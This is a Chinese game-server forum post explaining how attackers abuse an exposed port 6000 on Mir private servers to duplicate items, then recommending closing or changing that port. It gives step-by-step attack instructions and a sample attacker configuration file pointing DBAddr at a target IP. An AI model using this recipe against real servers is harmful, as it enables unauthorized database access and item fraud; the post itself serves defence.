网游资讯 社区服务 统计排行
  • 744阅读
  • 0回复
gm研究 在线

级别: 编辑

  • UID8
  • 精华 0
  • 发帖2399
  • 铜币1465 枚
  • 威望0 点
  • 贡献值565 点
  • 银元0 个
  • 好评度0 点
  • 在线时间151(时)
  • 注册时间2019-03-09
  • 最后登录2020-02-17
正序阅读   只看楼主      0楼 发表于: 2019-12-11
更多操作

[技术研究] 防止有心人用服务器漏洞盗刷游戏装备的方法

本帖被 admin 从 |更多|技术 移动到本区(2019-12-29)
一个完善程度高的千年私服需要gm掌握许多关于架设服务器的方面的技术,但是一个完善的服务器几乎不存在,因为每个游戏都拥有各种各样的漏洞,每个漏洞对游戏的影响都不一样,甚至修复一个漏洞之后还会牵连出很多别的漏洞,但是既然游戏存在着漏洞就必须要修复解决。因为游戏中的很多漏洞或多或少都会对玩家造成影响,不修复的话对玩家的游戏体验影响非常巨大。

首先: 攻击者自己开个,把开启6000端口的IP写到DBAddr=这里.
其次: 启动这个单机的服务器,在对方的里面申请一个帐号,建立一个名字(此账号是高级管理员号)
再次: 对方会去他想要黑的里(那就是你的咯)也注册一个一样的名字和ID(这里很重要!!不然对方进自己的站是黑屏的,哈哈...)
最后: 然后在对方自己的单机服务器上刷东西(小退很重要目的是把你刷出装备的数据写入他的DB),刷出来的东西就保存到对方想黑的的同名数据库!!

以下是攻击者的*:\MirServer\Mir200\!setup.txt

[Server]
ServerIndex=0
ServerName=入侵
ServerNumber=0
VentureServer=FALSE
TestServer=TRUE
TestLevel=7
TestGold=100
TestServerUserLimit=1000
ServiceMode=FALSE
NonPKServer=FALSE

;192.168.1.9(本机)IP (202.92.165.***)攻击者想要黑的IP(条件6000端口开着的)
DBAddr=202.92.165.22 (文章就在这里,这里是写对方要黑的IP)
DBPort=6000
IDSAddr=192.168.1.9
IDSPort=5600
MsgSrvAddr=192.168.1.9
MsgSrvPort=4900

由于对方攻击时只能默认你是6000端口(除非你被他知道你的端口),所以解决就很简单啦
解决办法如下:
1.封闭6000端口(本站下载区提供了策略)
2.更改数据库6000端口 [推荐第一种办法]
这就是gm防止别人利用服务器端口盗刷游戏装备防御方法,这个漏洞对于普通玩家来说可能算不上漏洞,但对于那些有一定计算机技术知识的不法分子来说是一个非常严重的漏洞,他们可以通过这个漏洞在游戏中刷大量的极品游戏装备武器,再转手售卖给游戏中的普通玩家从而获得利益。这种方式可以说严重影响了游戏平衡,并且会导致游戏中的很多好的装备变得泛滥。
描述
快速回复

如果您在写长篇帖子又不马上发表,建议存为草稿
认证码:

验证问题:
本站地址是? 正确答案:1opk.com
 回复后跳转到最后一页